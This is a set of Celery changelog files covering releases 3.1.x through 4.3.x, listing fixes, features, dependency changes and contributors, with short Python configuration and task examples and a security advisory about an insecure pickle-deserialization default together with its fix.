- App: New ``autofinalize`` option. Apps are automatically finalized when the task registry is accessed. You can now disable this behavior so that an exception is raised instead. Example:

  .. code-block:: python

      app = Celery(autofinalize=False)

      # raises RuntimeError
      tasks = app.tasks

      @app.task
      def add(x, y):
          return x + y

      # raises RuntimeError
      add.delay(2, 2)

      app.finalize()

      # no longer raises:
      tasks = app.tasks
      add.delay(2, 2)

- The worker didn't send monitoring events during shutdown.
- Worker: Mingle and gossip are now automatically disabled when used with an unsupported transport (Issue #1664).
- ``celery`` command: Preload options now support the rare ``--opt value`` format (Issue #1668).
- ``celery`` command: Options appearing before the sub-command were accidentally removed; these are now moved to the end instead.
- Worker now properly responds to ``inspect stats`` commands even if received before start-up is complete (Issue #1659).
- :signal:`task_postrun` is now sent within a :keyword:`finally` block, to make sure the signal is always sent.
- Beat: Fixed syntax error in string formatting. Contributed by :github_user:`nadad`.
- Fixed typos in the documentation. Fixes contributed by Loic Bistuer, :github_user:`sunfinite`.
- Nested chains now work properly when constructed using the ``chain`` type instead of the ``|`` operator (Issue #1656).

.. _version-3.1.4:

3.1.4
=====
:release-date: 2013-11-15 11:40 p.m. UTC
:release-by: Ask Solem

- Now depends on :ref:`Kombu 3.0.5 `.
- Now depends on :mod:`billiard` 3.3.0.7.
- Worker accidentally set a default socket timeout of 5 seconds.
- Django: Fix-up now sets the default app so that threads will use the same app instance (e.g., for :command:`manage.py runserver`).
- Worker: Fixed Unicode error crash at start-up experienced by some users.
- Calling ``.apply_async`` on an empty chain now works again (Issue #1650).
- The ``celery multi show`` command now generates the same arguments as the start command does.
- The :option:`--app ` argument could end up using a module object instead of an app instance (with a resulting crash).
- Fixed a syntax error problem in the beat init-script. Fix contributed by Vsevolod.
- Tests now passing on PyPy 2.1 and 2.2.

.. _version-3.1.3:

3.1.3
=====
:release-date: 2013-11-13 00:55 a.m. UTC
:release-by: Ask Solem

- Fixed compatibility problem with Python 2.7.0 - 2.7.5 (Issue #1637). ``unpack_from`` started supporting ``memoryview`` arguments in Python 2.7.6.
- Worker: :option:`-B ` argument accidentally closed files used for logging.
- Task decorated tasks now keep their docstring (Issue #1636).

.. _version-3.1.2:

3.1.2
=====
:release-date: 2013-11-12 08:00 p.m. UTC
:release-by: Ask Solem

- Now depends on :mod:`billiard` 3.3.0.6.
- No longer needs the billiard C extension to be installed.
- The worker silently ignored task errors.
- Django: Fixed ``ImproperlyConfigured`` error raised when no database backend specified. Fix contributed by :github_user:`j0hnsmith`.
- Prefork pool: Now using ``_multiprocessing.read`` with ``memoryview`` if available.
- ``close_open_fds`` now uses ``os.closerange`` if available.
- ``get_fdmax`` now takes value from ``sysconfig`` if possible.

.. _version-3.1.1:

3.1.1
=====
:release-date: 2013-11-11 06:30 p.m. UTC
:release-by: Ask Solem

- Now depends on :mod:`billiard` 3.3.0.4.
- Python 3: Fixed compatibility issues.
- Windows: Accidentally showed warning that the billiard C extension wasn't installed (Issue #1630).
- Django: Tutorial updated with a solution that sets a default :envvar:`DJANGO_SETTINGS_MODULE` so that it doesn't have to be typed in with the :program:`celery` command. Also fixed typos in the tutorial, and added the settings required to use the Django database backend. Thanks to Chris Ward, :github_user:`orarbel`.
- Django: Fixed a problem when using the Django settings in Django 1.6.
- Django: Fix-up shouldn't be applied if the django loader is active.
- Worker: Fixed attribute error for ``human_write_stats`` when using the compatibility prefork pool implementation.
- Worker: Fixed compatibility with billiard without C extension.
- Inspect.conf: Now supports a ``with_defaults`` argument.
- Group.restore: The backend argument wasn't respected.

.. _version-3.1.0:

3.1.0
=====
:release-date: 2013-11-09 11:00 p.m. UTC
:release-by: Ask Solem

See :ref:`whatsnew-3.1`.

.. _changelog-4.0:

================
 Change history
================

This document contains change notes for bugfix releases in the 4.0.x series (latentcall), please see :ref:`whatsnew-4.0` for an overview of what's new in Celery 4.0.

.. _version-4.0.2:

4.0.2
=====
:release-date: 2016-12-15 03:40 PM PST
:release-by: Ask Solem

- **Requirements**

  - Now depends on :ref:`Kombu 4.0.2 `.

- **Tasks**: Fixed problem with JSON serialization of `group` (``keys must be string`` error, Issue #3688).
- **Worker**: Fixed JSON serialization issue when using ``inspect active`` and friends (Issue #3667).
- **App**: Fixed saferef errors when using signals (Issue #3670).
- **Prefork**: Fixed bug with pack requiring bytes argument on Python 2.7.5 and earlier (Issue #3674).
- **Tasks**: Saferepr did not handle unicode in bytestrings on Python 2 (Issue #3676).
- **Testing**: Added new ``celery_worker_parameters`` fixture. Contributed by **Michael Howitz**.
- **Tasks**: Added new ``app`` argument to ``GroupResult.restore`` (Issue #3669). This makes the restore method behave the same way as the ``GroupResult`` constructor. Contributed by **Andreas Pelme**.
- **Tasks**: Fixed type checking crash when task takes ``*args`` on Python 3 (Issue #3678).
- Documentation and examples improvements by:

  - **BLAGA Razvan-Paul**
  - **Michael Howitz**
  - :github_user:`paradox41`

.. _version-4.0.1:

4.0.1
=====
:release-date: 2016-12-08 05:22 PM PST
:release-by: Ask Solem

* [Security: `CELERYSA-0003`_] Insecure default configuration

  The default :setting:`accept_content` setting was set to allow deserialization of pickled messages in Celery 4.0.0. The insecure default has been fixed in 4.0.1, and you can also configure the 4.0.0 version to explicitly only allow json serialized messages:

  .. code-block:: python

      app.conf.accept_content = ['json']

.. _`CELERYSA-0003`: https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0003.txt

- **Tasks**: Added new method to register class-based tasks (Issue #3615). To register a class based task you should now call ``app.register_task``:

  .. code-block:: python

      from celery import Celery, Task

      app = Celery()

      class CustomTask(Task):
          def run(self):
              return 'hello'

      app.register_task(CustomTask())

- **Tasks**: Argument checking now supports keyword-only arguments on Python 3 (Issue #3658). Contributed by :github_user:`sww`.
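A minimal sketch of the keyword-only argument checking mentioned in the last item; ``app`` is assumed to be an existing ``Celery`` instance and the task itself is made up:

.. code-block:: python

    @app.task
    def send_report(*, email, fmt='pdf'):
        # keyword-only parameters are now checked correctly when the
        # task is called or sent with .delay()/.apply_async()
        return (email, fmt)

    send_report.delay(email='admin@example.com')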
- **Tasks**: The ``task-sent`` event was not being sent even if configured to do so (Issue #3646).
- **Worker**: Fixed AMQP heartbeat support for eventlet/gevent pools (Issue #3649).
- **App**: ``app.conf.humanize()`` would not work if configuration not finalized (Issue #3652).
- **Utils**: ``saferepr`` attempted to show iterables as lists and mappings as dicts.
- **Utils**: ``saferepr`` did not handle unicode-errors when attempting to format ``bytes`` on Python 3 (Issue #3610).
- **Utils**: ``saferepr`` should now properly represent byte strings with non-ascii characters (Issue #3600).
- **Results**: Fixed bug in elasticsearch where _index method missed the body argument (Issue #3606). Fix contributed by **何翔宇** (Sean Ho).
- **Canvas**: Fixed :exc:`ValueError` in chord with single task header (Issue #3608). Fix contributed by **Viktor Holmqvist**.
- **Task**: Ensure class-based task has name prior to registration (Issue #3616). Fix contributed by **Rick Wargo**.
- **Beat**: Fixed problem with strings in shelve (Issue #3644). Fix contributed by **Alli**.
- **Worker**: Fixed :exc:`KeyError` in ``inspect stats`` when ``-O`` argument set to something other than ``fast`` or ``fair`` (Issue #3621).
- **Task**: Retried tasks were no longer sent to the original queue (Issue #3622).
- **Worker**: Python 3: Fixed None/int type comparison in :file:`apps/worker.py` (Issue #3631).
- **Results**: Redis has a new :setting:`redis_socket_connect_timeout` setting.
- **Results**: Redis result backend passed the ``socket_connect_timeout`` argument to UNIX socket based connections by mistake, causing a crash.
- **Worker**: Fixed missing logo in worker splash screen when running on Python 3.x (Issue #3627). Fix contributed by **Brian Luan**.
- **Deps**: Fixed ``celery[redis]`` bundle installation (Issue #3643). Fix contributed by **Rémi Marenco**.
- **Deps**: Bundle ``celery[sqs]`` now also requires :pypi:`pycurl` (Issue #3619).
- **Worker**: Hard time limits were no longer being respected (Issue #3618).
- **Worker**: Soft time limit log showed ``Trues`` instead of the number of seconds.
- **App**: ``registry_cls`` argument no longer had any effect (Issue #3613).
- **Worker**: Event producer now uses ``connection_for_write`` (Issue #3525).
- **Results**: Redis/memcache backends now use :setting:`result_expires` to expire chord counter (Issue #3573). Contributed by **Tayfun Sen**.
- **Django**: Fixed command for upgrading settings with Django (Issue #3563). Fix contributed by **François Voron**.
- **Testing**: Added a ``celery_parameters`` test fixture to be able to use customized ``Celery`` init parameters (#3626). Contributed by **Steffen Allner**.
- Documentation improvements contributed by:

  - :github_user:`csfeathers`
  - **Moussa Taifi**
  - **Yuhannaa**
  - **Laurent Peuch**
  - **Christian**
  - **Bruno Alla**
  - **Steven Johns**
  - :github_user:`tnir`
  - **GDR!**

.. _version-4.0.0:

4.0.0
=====
:release-date: 2016-11-04 02:00 P.M PDT
:release-by: Ask Solem

See :ref:`whatsnew-4.0` (in :file:`docs/whatsnew-4.0.rst`).

.. _version-4.0.0rc7:

4.0.0rc7
========
:release-date: 2016-11-02 01:30 P.M PDT

Important notes
---------------

- Database result backend related setting names changed from ``sqlalchemy_*`` -> ``database_*``. The ``sqlalchemy_`` named settings won't work at all in this version, so you need to rename them. This is a last minute change, and as they were not supported in 3.1 we will not be providing aliases (see the sketch below).
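A minimal sketch of the renamed database backend settings; the specific option shown (engine options) is just one example of the ``sqlalchemy_*`` -> ``database_*`` pattern, and the values are illustrative:

.. code-block:: python

    # Celery 4.0.0rc7 and later: only the ``database_`` prefixed names
    # are recognized for the SQLAlchemy result backend settings.
    app.conf.result_backend = 'db+sqlite:///results.sqlite'
    app.conf.database_engine_options = {'echo': True}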
- ``chain(A, B, C)`` now works the same way as ``A | B | C``. This means calling ``chain()`` might not actually return a chain, it can return a group or any other type depending on how the workflow can be optimized.

.. _changelog-4.1:

================
 Change history
================

This document contains change notes for bugfix releases in the 4.1.x series, please see :ref:`whatsnew-4.2` for an overview of what's new in Celery 4.2.

.. _version-4.1.1:

4.1.1
=====
:release-date: 2018-05-21 12:48 PM PST
:release-by: Omer Katz

.. important::

    Please upgrade as soon as possible or pin Kombu to 4.1.0.

- **Breaking Change**: The module `async` in Kombu changed to `asynchronous`. Contributed by **Omer Katz & Asif Saifuddin Auvi**

.. _version-4.1.0:

4.1.0
=====
:release-date: 2017-07-25 00:00 PM PST
:release-by: Omer Katz

- **Configuration**: CELERY_SEND_EVENTS instead of CELERYD_SEND_EVENTS for 3.1.x compatibility (#3997) Contributed by **abhinav nilaratna**.
- **App**: Restore behavior so Broadcast queues work. (#3934) Contributed by **Patrick Cloke**.
- **Sphinx**: Make appstr use standard format (#4134) (#4139) Contributed by **Preston Moore**.
- **App**: Make id, name always accessible from logging.Formatter via extra (#3994) Contributed by **Yoichi NAKAYAMA**.
- **Worker**: Add worker_shutting_down signal (#3998) Contributed by **Daniel Huang**.
- **PyPy**: Support PyPy version 5.8.0 (#4128) Contributed by **Omer Katz**.
- **Results**: Elasticsearch: Fix serializing keys (#3924) Contributed by :github_user:`staticfox`.
- **Canvas**: Deserialize all tasks in a chain (#4015) Contributed by :github_user:`fcoelho`.
- **Systemd**: Recover loglevel for ExecStart in systemd config (#4023) Contributed by **Yoichi NAKAYAMA**.
- **Sphinx**: Use the Sphinx add_directive_to_domain API. (#4037) Contributed by **Patrick Cloke**.
- **App**: Pass properties to before_task_publish signal (#4035) Contributed by **Javier Domingo Cansino**.
- **Results**: Add SSL option for Redis backends (#3831) Contributed by **Chris Kuehl**.
- **Beat**: celery.schedule.crontab: fix reduce (#3826) (#3827) Contributed by **Taylor C. Richberger**.
- **State**: Fix celery issues when using flower REST API. Contributed by **Thierry RAMORASOAVINA**.
- **Results**: Elasticsearch: Fix serializing document id. Contributed by **Acey9**.
- **Beat**: Make shallow copy of schedules dictionary. Contributed by **Brian May**.
- **Beat**: Populate heap when periodic tasks are changed. Contributed by **Wojciech Żywno**.
- **Task**: Allow class methods to define tasks (#3952) Contributed by **georgepsarakis**.
- **Platforms**: Always return boolean value when checking if signal is supported (#3962). Contributed by **Jian Yu**.
- **Canvas**: Avoid duplicating chains in chords (#3779) Contributed by **Ryan Hiebert**.
- **Canvas**: Lookup task only if list has items (#3847) Contributed by **Marc Gibbons**.
- **Results**: Allow unicode message for exception raised in task (#3903) Contributed by **George Psarakis**.
- **Python3**: Support for Python 3.6 (#3904, #3903, #3736) Contributed by **Jon Dufresne**, **George Psarakis**, **Asif Saifuddin Auvi**, **Omer Katz**.
- **App**: Fix retried tasks with expirations (#3790) Contributed by **Brendan MacDonell**.
- Fixes items format route in docs (#3875) Contributed by **Slam**.
- **Utils**: Fix maybe_make_aware (#3850) Contributed by **Taylor C. Richberger**. - **Task**: Fix task ETA issues when timezone is defined in configuration (#3867) Contributed by **George Psarakis**. - **Concurrency**: Consumer does not shutdown properly when embedded in gevent application (#3746) Contributed by **Arcadiy Ivanov**. - **Canvas**: Fix #3725: Task replaced with group does not complete (#3731) Contributed by **Morgan Doocy**. - **Task**: Correct order in chains with replaced tasks (#3730) Contributed by **Morgan Doocy**. - **Result**: Enable synchronous execution of sub-tasks (#3696) Contributed by **shalev67**. - **Task**: Fix request context for blocking task apply (added hostname) (#3716) Contributed by **Marat Sharafutdinov**. - **Utils**: Fix task argument handling (#3678) (#3693) Contributed by **Roman Sichny**. - **Beat**: Provide a transparent method to update the Scheduler heap (#3721) Contributed by **Alejandro Pernin**. - **Beat**: Specify default value for pidfile option of celery beat. (#3722) Contributed by **Arnaud Rocher**. - **Results**: Elasticsearch: Stop generating a new field every time when a new result is being put (#3708) Contributed by **Mike Chen**. - **Requirements** - Now depends on :ref:`Kombu 4.1.0 `. - **Results**: Elasticsearch now reuses fields when new results are added. Contributed by **Mike Chen**. - **Results**: Fixed MongoDB integration when using binary encodings (Issue #3575). Contributed by **Andrew de Quincey**. - **Worker**: Making missing ``*args`` and ``**kwargs`` in Task protocol 1 return empty value in protocol 2 (Issue #3687). Contributed by **Roman Sichny**. - **App**: Fixed :exc:`TypeError` in AMQP when using deprecated signal (Issue #3707). Contributed by :github_user:`michael-k`. - **Beat**: Added a transparent method to update the scheduler heap. Contributed by **Alejandro Pernin**. - **Task**: Fixed handling of tasks with keyword arguments on Python 3 (Issue #3657). Contributed by **Roman Sichny**. - **Task**: Fixed request context for blocking task apply by adding missing hostname attribute. Contributed by **Marat Sharafutdinov**. - **Task**: Added option to run subtasks synchronously with ``disable_sync_subtasks`` argument. Contributed by :github_user:`shalev67`. - **App**: Fixed chaining of replaced tasks (Issue #3726). Contributed by **Morgan Doocy**. - **Canvas**: Fixed bug where replaced tasks with groups were not completing (Issue #3725). Contributed by **Morgan Doocy**. - **Worker**: Fixed problem where consumer does not shutdown properly when embedded in a gevent application (Issue #3745). Contributed by **Arcadiy Ivanov**. - **Results**: Added support for using AWS DynamoDB as a result backend (#3736). Contributed by **George Psarakis**. - **Testing**: Added caching on pip installs. Contributed by :github_user:`orf`. - **Worker**: Prevent consuming queue before ready on startup (Issue #3620). Contributed by **Alan Hamlett**. - **App**: Fixed task ETA issues when timezone is defined in configuration (Issue #3753). Contributed by **George Psarakis**. - **Utils**: ``maybe_make_aware`` should not modify datetime when it is already timezone-aware (Issue #3849). Contributed by **Taylor C. Richberger**. - **App**: Fixed retrying tasks with expirations (Issue #3734). Contributed by **Brendan MacDonell**. - **Results**: Allow unicode message for exceptions raised in task (Issue #3858). Contributed by :github_user:`staticfox`. - **Canvas**: Fixed :exc:`IndexError` raised when chord has an empty header. 
Contributed by **Marc Gibbons**.

- **Canvas**: Avoid duplicating chains in chords (Issue #3771). Contributed by **Ryan Hiebert** and **George Psarakis**.
- **Utils**: Allow class methods to define tasks (Issue #3863). Contributed by **George Psarakis**.
- **Beat**: Populate heap when periodic tasks are changed. Contributed by :github_user:`wzywno` and **Brian May**.
- **Results**: Added support for Elasticsearch backend options settings. Contributed by :github_user:`Acey9`.
- **Events**: Ensure ``Task.as_dict()`` works when not all information about task is available. Contributed by :github_user:`tramora`.
- **Schedules**: Fixed pickled crontab schedules to restore properly (Issue #3826). Contributed by **Taylor C. Richberger**.
- **Results**: Added SSL option for redis backends (Issue #3830). Contributed by **Chris Kuehl**.
- Documentation and examples improvements by:

  - **Bruno Alla**
  - **Jamie Alessio**
  - **Vivek Anand**
  - **Peter Bittner**
  - **Kalle Bronsen**
  - **Jon Dufresne**
  - **James Michael DuPont**
  - **Sergey Fursov**
  - **Samuel Dion-Girardeau**
  - **Daniel Hahler**
  - **Mike Helmick**
  - **Marc Hörsken**
  - **Christopher Hoskin**
  - **Daniel Huang**
  - **Primož Kerin**
  - **Michal Kuffa**
  - **Simon Legner**
  - **Anthony Lukach**
  - **Ed Morley**
  - **Jay McGrath**
  - **Rico Moorman**
  - **Viraj Navkal**
  - **Ross Patterson**
  - **Dmytro Petruk**
  - **Luke Plant**
  - **Eric Poelke**
  - **Salvatore Rinchiera**
  - **Arnaud Rocher**
  - **Kirill Romanov**
  - **Simon Schmidt**
  - **Tamer Sherif**
  - **YuLun Shih**
  - **Ask Solem**
  - **Tom 'Biwaa' Riat**
  - **Arthur Vigil**
  - **Joey Wilhelm**
  - **Jian Yu**
  - **YuLun Shih**
  - **Arthur Vigil**
  - **Joey Wilhelm**
  - :github_user:`baixuexue123`
  - :github_user:`bronsen`
  - :github_user:`michael-k`
  - :github_user:`orf`
  - :github_user:`3lnc`

.. _changelog-4.2:

================
 Change history
================

This document contains change notes for bugfix releases in the 4.2.x series, please see :ref:`whatsnew-4.2` for an overview of what's new in Celery 4.2.

4.2.1
=====
:release-date: 2018-07-18 11:00 AM IST
:release-by: Omer Katz

- **Result Backend**: Fix deserialization of exceptions that are present in the producer codebase but not in the consumer codebase. Contributed by **John Arnold**
- **Message Protocol Compatibility**: Fix error caused by an invalid (None) timelimit value in the message headers when migrating messages from 3.x to 4.x. Contributed by **Robert Kopaczewski**
- **Result Backend**: Fix serialization of exception arguments when exception arguments are not JSON serializable by default. Contributed by **Tom Booth**
- **Worker**: Fixed multiple issues with rate limited tasks:

  - Maintain scheduling order.
  - Fix possible scheduling of a :class:`celery.worker.request.Request` with the wrong :class:`kombu.utils.limits.TokenBucket` which could cause tasks' rate limit to behave incorrectly.
  - Fix possible duplicated execution of tasks that were rate limited or if ETA/Countdown was provided for them.

  Contributed by :github_user:`ideascf`
- **Worker**: Defensively handle invalid timelimit header values in requests. Contributed by **Omer Katz**

Documentation fixes:

- **Matt Wiens**
- **Seunghun Lee**
- **Lewis M.
Kabui** - **Prathamesh Salunkhe** 4.2.0 ===== :release-date: 2018-06-10 21:30 PM IST :release-by: Omer Katz - **Task**: Add ``ignore_result`` as task execution option (#4709, #3834) Contributed by **Andrii Kostenko** and **George Psarakis**. - **Redis Result Backend**: Do not create PubSub subscriptions when results are ignored (#4709, #3834) Contributed by **Andrii Kostenko** and **George Psarakis**. - **Redis Result Backend**: Result consumer always unsubscribes when task state is ready (#4666) Contributed by **George Psarakis**. - **Development/Testing**: Add docker-compose and base Dockerfile for development (#4482) Contributed by **Chris Mitchell**. - **Documentation/Sphinx**: Teach autodoc to document tasks if undoc-members is not set (#4588) Contributed by **Leo Singer**. - **Documentation/Sphinx**: Put back undoc-members option in sphinx test (#4586) Contributed by **Leo Singer**. - **Documentation/Sphinx**: Sphinx autodoc picks up tasks automatically only if `undoc-members` is set (#4584) Contributed by **Leo Singer**. - **Task**: Fix shadow_name issue when using previous version Task class (#4572) Contributed by :github_user:`pachewise`. - **Task**: Add support for bound tasks as `link_error` parameter (Fixes #3723) (#4545) Contributed by :github_user:`brabiega`. - **Deployment**: Add a command line option for setting the Result Backend URL (#4549) Contributed by :github_user:`y0ngdi`. - **CI**: Enable pip cache in appveyor build (#4546) Contributed by **Thijs Triemstra**. - **Concurrency/Asynpool**: Fix errno property name shadowing. Contributed by **Omer Katz**. - **DynamoDB Backend**: Configurable endpoint URL (#4532) Contributed by **Bohdan Rybak**. - **Timezones**: Correctly detect UTC timezone and timezone from settings (Fixes #4517) (#4519) Contributed by :github_user:`last-partizan`. - **Control**: Cleanup the mailbox's producer pool after forking (#4472) Contributed by **Nick Eaket**. - **Documentation**: Start Celery and Celery Beat on Azure WebJob (#4484) Contributed by **PauloPeres**. - **Celery Beat**: Schedule due tasks on startup, after Beat restart has occurred (#4493) Contributed by **Igor Kasianov**. - **Worker**: Use absolute time when task is accepted by worker pool (#3684) Contributed by **Régis Behmo**. - **Canvas**: Propagate arguments to chains inside groups (#4481) Contributed by **Chris Mitchell**. - **Canvas**: Fix `Task.replace` behavior in nested chords (fixes #4368) (#4369) Contributed by **Denis Shirokov** & **Alex Hill**. - **Installation**: Pass python_requires argument to setuptools (#4479) Contributed by **Jon Dufresne**. - **Message Protocol Compatibility**: Handle "hybrid" messages that have moved between Celery versions (#4358) (Issue #4356) Contributed by **Russell Keith-Magee**. - **Canvas**: request on_timeout now ignores soft time limit exception (fixes #4412) (#4473) Contributed by **Alex Garel**. - **Redis Result Backend**: Integration test to verify PubSub unsubscriptions (#4468) Contributed by **George Psarakis**. - **Message Protocol Properties**: Allow the shadow keyword argument and the shadow_name method to set shadow properly (#4381) Contributed by :github_user:`hclihn`. - **Canvas**: Run chord_unlock on same queue as chord body (#4448) (Issue #4337) Contributed by **Alex Hill**. - **Canvas**: Support chords with empty header group (#4443) Contributed by **Alex Hill**. - **Timezones**: make astimezone call in localize more safe (#4324) Contributed by **Matt Davis**. 
- **Canvas**: Fix length-1 and nested chords (#4437) (Issues #4393, #4055, #3885, #3597, #3574, #3323, #4301) Contributed by **Alex Hill**. - **CI**: Run `Openstack Bandit `_ in Travis CI in order to detect security issues. Contributed by **Omer Katz**. - **CI**: Run `isort `_ in Travis CI in order to lint Python **import** statements. Contributed by **Omer Katz**. - **Canvas**: Resolve TypeError on `.get` from nested groups (#4432) (Issue #4274) Contributed by **Misha Wolfson**. - **CouchDB Backend**: Correct CouchDB key string type for Python 2/3 compatibility (#4166) Contributed by :github_user:`fmind` && **Omer Katz**. - **Group Result**: Fix current_app fallback in GroupResult.restore() (#4431) Contributed by **Alex Hill**. - **Consul Backend**: Correct key string type for Python 2/3 compatibility (#4416) Contributed by **Wido den Hollander**. - **Group Result**: Correctly restore an empty GroupResult (#2202) (#4427) Contributed by **Alex Hill** & **Omer Katz**. - **Result**: Disable synchronous waiting for sub-tasks on eager mode(#4322) Contributed by **Denis Podlesniy**. - **Celery Beat**: Detect timezone or Daylight Saving Time changes (#1604) (#4403) Contributed by **Vincent Barbaresi**. - **Canvas**: Fix append to an empty chain. Fixes #4047. (#4402) Contributed by **Omer Katz**. - **Task**: Allow shadow to override task name in trace and logging messages. (#4379) Contributed by :github_user:`hclihn`. - **Documentation/Sphinx**: Fix getfullargspec Python 2.x compatibility in contrib/sphinx.py (#4399) Contributed by **Javier Martin Montull**. - **Documentation**: Updated installation instructions for SQS broker (#4382) Contributed by **Sergio Fernandez**. - **Celery Beat**: Better equality comparison for ScheduleEntry instances (#4312) Contributed by :github_user:`mariia-zelenova`. - **Task**: Adding 'shadow' property to as_task_v2 (#4350) Contributed by **Marcelo Da Cruz Pinto**. - Try to import directly, do not use deprecated imp method (#4216) Contributed by **Tobias Kunze**. - **Task**: Enable `kwargsrepr` and `argsrepr` override for modifying task argument representation (#4260) Contributed by **James M. Allen**. - **Result Backend**: Add Redis Sentinel backend (#4144) Contributed by **Geoffrey Bauduin**. - Use unique time values for Collections/LimitedSet (#3879 and #3891) (#3892) Contributed by :github_user:`lead2gold`. - **CI**: Report coverage for all result backends. Contributed by **Omer Katz**. - **Django**: Use Django DB max age connection setting (fixes #4116) (#4292) Contributed by **Marco Schweighauser**. - **Canvas**: Properly take into account chain tasks link_error (#4240) Contributed by :github_user:`agladkov`. - **Canvas**: Allow to create group with single task (fixes issue #4255) (#4280) Contributed by :github_user:`agladkov`. - **Canvas**: Copy dictionary parameter in chord.from_dict before modifying (fixes issue #4223) (#4278) Contributed by :github_user:`agladkov`. - **Results Backend**: Add Cassandra options (#4224) Contributed by **Scott Cooper**. - **Worker**: Apply rate limiting for tasks with ETA (#4251) Contributed by :github_user:`arpanshah29`. - **Celery Beat**: support scheduler entries without a schedule (#4235) Contributed by **Markus Kaiserswerth**. - **SQS Broker**: Updated SQS requirements file with correct boto3 version (#4231) Contributed by **Alejandro Varas**. - Remove unused code from _create_app contextmanager (#4204) Contributed by **Ryan P Kilby**. 
- **Group Result**: Modify GroupResult.as_tuple() to include parent (fixes #4106) (#4205) Contributed by :github_user:`pachewise`. - **Beat**: Set default scheduler class in beat command. (#4189) Contributed by :github_user:`Kxrr`. - **Worker**: Retry signal receiver after raised exception (#4192) Contributed by **David Davis**. - **Task**: Allow custom Request class for tasks (#3977) Contributed by **Manuel Vázquez Acosta**. - **Django**: Django fixup should close all cache backends (#4187) Contributed by **Raphaël Riel**. - **Deployment**: Adds stopasgroup to the supervisor scripts (#4200) Contributed by :github_user:`martialp`. - Using Exception.args to serialize/deserialize exceptions (#4085) Contributed by **Alexander Ovechkin**. - **Timezones**: Correct calculation of application current time with timezone (#4173) Contributed by **George Psarakis**. - **Remote Debugger**: Set the SO_REUSEADDR option on the socket (#3969) Contributed by **Theodore Dubois**. - **Django**: Celery ignores exceptions raised during `django.setup()` (#4146) Contributed by **Kevin Gu**. - Use heartbeat setting from application configuration for Broker connection (#4148) Contributed by :github_user:`mperice`. - **Celery Beat**: Fixed exception caused by next_transit receiving an unexpected argument. (#4103) Contributed by **DDevine**. - **Task** Introduce exponential backoff with Task auto-retry (#4101) Contributed by **David Baumgold**. - **AsyncResult**: Remove weak-references to bound methods in AsyncResult promises. (#4131) Contributed by **Vinod Chandru**. - **Development/Testing**: Allow eager application of canvas structures (#4576) Contributed by **Nicholas Pilon**. - **Command Line**: Flush stderr before exiting with error code 1. Contributed by **Antonin Delpeuch**. - **Task**: Escapes single quotes in kwargsrepr strings. Contributed by **Kareem Zidane** - **AsyncResult**: Restore ability to join over ResultSet after fixing celery/#3818. Contributed by **Derek Harland** - **Redis Results Backend**: Unsubscribe on message success. Previously Celery would leak channels, filling the memory of the Redis instance. Contributed by **George Psarakis** - **Task**: Only convert eta to isoformat when it is not already a string. Contributed by **Omer Katz** - **Redis Results Backend**: The result_backend setting now supports rediss:// URIs Contributed by **James Remeika** - **Canvas** Keyword arguments are passed to tasks in chain as expected. Contributed by :github_user:`tothegump` - **Django** Fix a regression causing Celery to crash when using Django. Contributed by **Jonas Haag** - **Canvas** Chain with one task now runs as expected. Contributed by :github_user:`tothegump` - **Kombu** Celery 4.2 now requires Kombu 4.2 or better. Contributed by **Omer Katz & Asif Saifuddin Auvi** - `GreenletExit` is not in `__all__` in greenlet.py which can not be imported by Python 3.6. The import was adjusted to work on Python 3.6 as well. Contributed by **Hsiaoming Yang** - Fixed a regression that occurred during the development of Celery 4.2 which caused `celery report` to crash when Django is installed. Contributed by **Josue Balandrano Coronel** - Matched the behavior of `GroupResult.as_tuple()` to that of `AsyncResult.as_tuple()`. The group's parent is now serialized correctly. Contributed by **Josue Balandrano Coronel** - Use Redis coercion mechanism for converting URI query parameters. Contributed by **Justin Patrin** - Fixed the representation of `GroupResult`. The dependency graph is now presented correctly. 
Contributed by **Josue Balandrano Coronel**

Documentation, CI, Installation and Tests fixes:

- **Sammie S. Taunton**
- **Dan Wilson**
- :github_user:`pachewise`
- **Sergi Almacellas Abellana**
- **Omer Katz**
- **Alex Zaitsev**
- **Leo Singer**
- **Rachel Johnson**
- **Jon Dufresne**
- **Samuel Dion-Girardeau**
- **Ryan Guest**
- **Huang Huang**
- **Geoffrey Bauduin**
- **Andrew Wong**
- **Mads Jensen**
- **Jackie Leng**
- **Harry Moreno**
- :github_user:`michael-k`
- **Nicolas Mota**
- **Armenak Baburyan**
- **Patrick Zhang**
- :github_user:`anentropic`
- :github_user:`jairojair`
- **Ben Welsh**
- **Michael Peake**
- **Fengyuan Chen**
- :github_user:`arpanshah29`
- **Xavier Hardy**
- **Shitikanth**
- **Igor Kasianov**
- **John Arnold**
- :github_user:`dmollerm`
- **Robert Knight**
- **Asif Saifuddin Auvi**
- **Eduardo Ramírez**
- **Kamil Breguła**
- **Juan Gutierrez**

.. _changelog-4.3:

================
 Change history
================

This document contains change notes for bugfix releases in the 4.3.x series, please see :ref:`whatsnew-4.3` for an overview of what's new in Celery 4.3.

4.3.1
=====
:release-date: 2020-09-10 1:00 P.M UTC+3:00
:release-by: Omer Katz

- Limit vine version to be below 5.0.0. Contributed by **Omer Katz**

4.3.0
=====
:release-date: 2019-03-31 7:00 P.M UTC+3:00
:release-by: Omer Katz

- Added support for broadcasting using a regular expression pattern or a glob pattern to multiple Pidboxes. This allows you to inspect or ping multiple workers at once. Contributed by **Dmitry Malinovsky** & **Jason Held**
- Added support for PEP 420 namespace packages. This allows you to load tasks from namespace packages. Contributed by **Colin Watson**
- Added :setting:`acks_on_failure_or_timeout` as a setting instead of a task only option. This was missing from the original PR but now added for completeness. Contributed by **Omer Katz**
- Added the :signal:`task_received` signal. Contributed by **Omer Katz**
- Fixed a crash of our CLI that occurred for everyone using Python < 3.6. The crash was introduced in `acd6025 `_ by using the :class:`ModuleNotFoundError` exception which was introduced in Python 3.6. Contributed by **Omer Katz**
- Fixed a crash that occurred when using the Redis result backend while the :setting:`result_expires` is set to None. Contributed by **Toni Ruža** & **Omer Katz**
- Added support for the `DNS seedlist connection format `_ for the MongoDB result backend. This requires the `dnspython` package which will be installed by default when installing the dependencies for the MongoDB result backend. Contributed by **George Psarakis**
- Bump the minimum eventlet version to 0.24.1. Contributed by **George Psarakis**
- Replace the `msgpack-python` package with `msgpack`. We're no longer using the deprecated package. See our :ref:`important notes ` for this release for further details on how to upgrade. Contributed by **Daniel Hahler**
- Allow scheduling error handlers which are not registered tasks in the current worker. These kinds of error handlers are now possible:

  .. code-block:: python

      from celery import Signature
      Signature(
          'bar', args=['foo'],
          link_error=Signature('msg.err', queue='msg')
      ).apply_async()

- Additional fixes and enhancements to the SSL support of the Redis broker and result backend.
